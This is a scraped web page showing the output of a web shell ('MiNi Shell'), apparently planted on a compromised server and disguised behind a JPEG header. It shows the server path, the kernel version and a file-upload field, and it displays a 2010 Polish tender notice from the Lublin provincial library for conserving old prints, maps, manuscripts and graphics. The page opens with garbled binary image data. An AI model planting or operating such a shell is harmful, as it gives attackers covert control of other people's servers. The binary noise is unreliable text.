JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100521/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100521/139966-N-2010.html

<p class="kh_header"><b>Lublin: wykonanie konserwacji starych druków, kartografii, rękopisów i grafiki w ramach realizacji zadania Konserwacja 8 jednostek dla Wojewódzkiej Biblioteki Publicznej im. H. Łopacińskiego w Lublinie.</b><br>
<b>Numer ogłoszenia: 139966 - 2010; data zamieszczenia: 21.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzka Biblioteka Publiczna im. H. Łopacińskiego w Lublinie , ul. Narutowicza 4, 20-950 Lublin, woj. lubelskie, tel. 081 5287430, 5287400, faks 081 5287406.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://hieronim.wbp.lublin.pl/wbp/obibliotece.htm</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie konserwacji starych druków, kartografii, rękopisów i grafiki w ramach realizacji zadania Konserwacja 8 jednostek dla Wojewódzkiej Biblioteki Publicznej im. H. Łopacińskiego w Lublinie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje konserwację 2 starych druków, 2 kartografii, 2 rękopisów oraz 2 grafik z podziałem na 8 części:
1 część - konserwacja starodruku Statua provincialis Gnesnensis
2 część - konserwacja starodruku  Głos poselski w głosie, Wwa 1748
3 część - konserwacja  kartografii Charte von Africa, Augsburg, ok. 1830
4 część - konserwacja kartografii  Cracovia minoris Poloniae, Amsterdam 1660
5 część - konserwacja rękopisu  Liber transactionum 1527-1700 k. 336
6 część - konserwacja rękopisu Liber transactionum 1730 k. 300
7 część - konserwacja grafiki  Lerue A. - Album Lubelskie, 1857
8 część  - konserwacja grafiki  Zamoyski Andrea.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.80.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od Wykonawcy przystępującego do postępowania wpłaty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania ww. warunków dokonana zostanie na zasadzie kryterium spełnia-nie spełnia w oparciu złożone przez Wykonawcę w niniejszym postępowaniu dokumenty oraz oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie realizacji przynajmniej dwóch usług. odpowiadających przedmiotowi zamówienia. Ocena spełniania ww. warunków dokonana zostanie na zasadzie kryterium spełnia-nie spełnia w oparciu złożone przez Wykonawcę w niniejszym postępowaniu dokumenty oraz oświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania ww. warunków dokonana zostanie na zasadzie kryterium spełnia-nie spełnia w oparciu złożone przez Wykonawcę w niniejszym postępowaniu dokumenty oraz oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają odpowiednie kwalifikacje zawodowe i wykształcenie niezbędne do wykonania zamówienia. Ocena spełniania ww. warunków dokonana zostanie na zasadzie kryterium spełnia-nie spełnia w oparciu złożone przez Wykonawcę w niniejszym postępowaniu dokumenty oraz oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Do wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług należy załączyć dokumenty potwierdzające, że usługi te zostały wykonane lub są wykonywane należycie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://hieronim.wbp.lublin.pl/wbp/obibliotece.htm<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Narutowicza 4, 20-950 Lublin, pokój nr 20, Sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2010 godzina 10:00, miejsce: siedziba Zamawiającego, ul. Narutowicza 4, 20-950 Lublin, pokój nr 20, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> konserwacja starodruku Statua provincialis Gnesnensis.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Inkunabuł liczy 206 kart o wymiarach 21,5 x 15 cm. Papier bibulasty i wysypujący z rozległymi ubytkami. Dominują zniszczenia biologiczne i mechaniczne. Stopień zniszczenia 35%. Blok luźny, bardzo zniszczony.
Głównym celem prac jest zabezpieczenie walorów estetycznych i użytkowych przedmiotu oraz właściwe przygotowanie do przechowywania i ekspozycji.
Konieczne prace:
- dezynfekcja w parach PCMC
- zabezpieczenie druku i krawędzi przed uszkodzeniem w dalszych zabiegach oraz 
  uzupełnianie ubytków papieru
- wieloetapowe czyszczenie struktury papieru
- zabiegi wybielające podłoże papieru i ich neutralizacja
- prostowanie i stabilizacja papieru
- czyszczenie zachowanych fragmentów skór i okładzin
- uelastycznianie i wzmacnianie wytrzymałości mechanicznej nową indywidualnie dobraną 
  skórą..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.80.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> konserwacja starodruku  Głos poselski w głosie, Wwa 1748.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Druk liczy 130 kart o wymiarach 19 x 13,. Papier bibulasty i wysypujący z rozległymi ubytkami. Dominują zniszczenia biologiczne i mechaniczne. Stopień zniszczenia 40%. Blok luźny, bardzo zniszczony.
Głównym celem prac jest zabezpieczenie walorów estetycznych i użytkowych przedmiotu oraz właściwe przygotowanie do przechowywania i ekspozycji.
Konieczne prace:
- dezynfekcja w parach PCMC
- zabezpieczenie druku i krawędzi przed uszkodzeniem w dalszych zabiegach oraz 
  uzupełnianie ubytków papieru
- wieloetapowe czyszczenie struktury papieru
- zabiegi wybielające podłoże papieru i ich neutralizacja
- prostowanie i stabilizacja papieru
- czyszczenie zachowanych fragmentów skór i okładzin
- uelastycznianie i wzmacnianie wytrzymałości mechanicznej nową indywidualnie dobraną 
  skórą..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.80.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> konserwacja  kartografii Charte von Africa, [Augsburg, ok. 1830].</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mapa o wymiarach 50,5 x 59,5 cm. Rysunek mapy wykonano na papierze czerpanym stosując technikę graficzną i malarską. Papier naklejono na białe płótno używając kleju organicznego.
Poważne zniszczenia mapy są widoczne w każdym elemencie składowym. Obie strony mapy
pokryte są licznymi ciemnymi śladami pozostawionymi przez owady. Karta ma dużo zniszczeń mechanicznych. Pozostały również ślady wygryzienia przez gryzonie. Widoczne są także kolonie grzybów.
Głównym celem prac jest zabezpieczenie walorów estetycznych i użytkowych przedmiotu oraz właściwe przygotowanie do przechowywania i ekspozycji.
Konieczne prace:
- badania z zakresu techniki wykonania przedmiotu oraz zanieczyszczeń mikrobiologicznych 
- po oddzieleniu papieru mapy od płótna wieloetapowe czyszczenie struktury papieru metodą 
  chemiczną
- naprawa i wzmocnienie powierzchni papieru
- zabezpieczenie barwnych fragmentów warstwy rysunkowej
- ponowny montaż mapy na oczyszczone płótno..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.80.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> konserwacja kartografii  Cracovia minoris Poloniae, Amsterdam 1660.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mapa (widok) o wymiarach 42 x 55 cm. Stan uszkodzenia mapy  jest wynikiem techniki powstania i destrukcji biologicznej.
Głównym celem prac jest zabezpieczenie walorów estetycznych i użytkowych przedmiotu oraz właściwe przygotowanie do przechowywania i ekspozycji.
Konieczne prace:
- badania z zakresu techniki wykonania przedmiotu oraz zanieczyszczeń mikrobiologicznych 
- wieloetapowe czyszczenie powierzchni papieru
- zabezpieczenie warstwy malarskiej
- wieloetapowe odkwaszanie papieru
- wykonanie oprawy typu passe-partout.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.80.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> konserwacja rękopisu  Liber transactionum 1527-1700 k. 336.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jednostka liczy 336 kart o wymiarach 31 x 19 x 3 cm. Jest to księga rękopiśmienna uwierzytelniona pieczęciami. Księga ma poważnie naruszoną konstrukcję co utrudnia jej otwieranie. Następujące po sobie zawilgocenia i przesuszenia skórzanej okładziny  spowodowały kurczenie się skóry. Znajdujący się wewnątrz papier ma licznie rozsiane kolonie mikroorganizmów.
Głównym celem prac jest zabezpieczenie walorów estetycznych i użytkowych przedmiotu oraz właściwe przygotowanie do przechowywania i ekspozycji.
Konieczne prace:
- badania z zakresu techniki wykonania przedmiotu oraz zanieczyszczeń mikrobiologicznych 
- zabezpieczenie wrażliwych atramentów i krawędzi przed uszkodzeniem w dalszych 
  zabiegach
- wieloetapowe czyszczenie powierzchni papieru
- uzupełnianie ubytków papieru oraz wzmacnianie miejsc uszkodzonych
- uelastycznianie i natłuszczanie skórzanej okładziny
- zabezpieczanie powierzchni skórzanej okładziny przed brudzeniem się..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.80.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> konserwacja rękopisu Liber transactionum 1730 k. 300.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jednostka liczy 300 kart o wymiarach 31 x 19 x 3 cm. Jest to księga rękopiśmienna uwierzytelniona pieczęciami.  Księga ma poważnie naruszoną konstrukcję co utrudnia jej otwieranie. Następujące po sobie zawilgocenia i przesuszenia skórzanej okładziny  spowodowały kurczenie się skóry. Znajdujący się wewnątrz papier ma licznie rozsiane kolonie mikroorganizmów.
Głównym celem prac jest zabezpieczenie walorów estetycznych i użytkowych przedmiotu oraz właściwe przygotowanie do przechowywania i ekspozycji.
Konieczne prace:
- badania z zakresu techniki wykonania przedmiotu oraz zanieczyszczeń mikrobiologicznych 
- zabezpieczenie wrażliwych atramentów i krawędzi przed uszkodzeniem w dalszych 
  zabiegach
- wieloetapowe czyszczenie powierzchni papieru
- wzmacnianie miejsc uszkodzonych
- uelastycznianie i natłuszczanie skórzanej okładziny
- zabezpieczanie powierzchni skórzanej okładziny przed brudzeniem się..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.80.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> konserwacja grafiki  Lerue A. - Album Lubelskie, 1857.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Album liczy 89 kart, litografii 39. Stan powstałych uszkodzeń jest wynikiem techniki powstania i naruszeń mechanicznych. Stopień uszkodzenia 30%.
Głównym celem prac jest zabezpieczenie walorów estetycznych i użytkowych przedmiotu oraz właściwe przygotowanie do przechowywania i ekspozycji.
Konieczne prace:
- badania z zakresu techniki wykonania przedmiotu oraz zanieczyszczeń mikrobiologicznych 
- wieloetapowe czyszczenie powierzchni papieru
- wzmacnianie miejsc uszkodzonych
- stabilizacja wymiarowa grafik.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.80.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> konserwacja grafiki  Zamoyski Andrea.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grafika o wymiarach 43,5 x 35, 5 cm. Stan powstałych uszkodzeń jest wynikiem techniki powstania i naruszeń mechanicznych.
Konieczne prace:
- badania z zakresu techniki wykonania przedmiotu oraz zanieczyszczeń mikrobiologicznych 
- wieloetapowe czyszczenie powierzchni papieru
- wzmacnianie miejsc uszkodzonych
- stabilizacja wymiarowa grafiki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.80.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com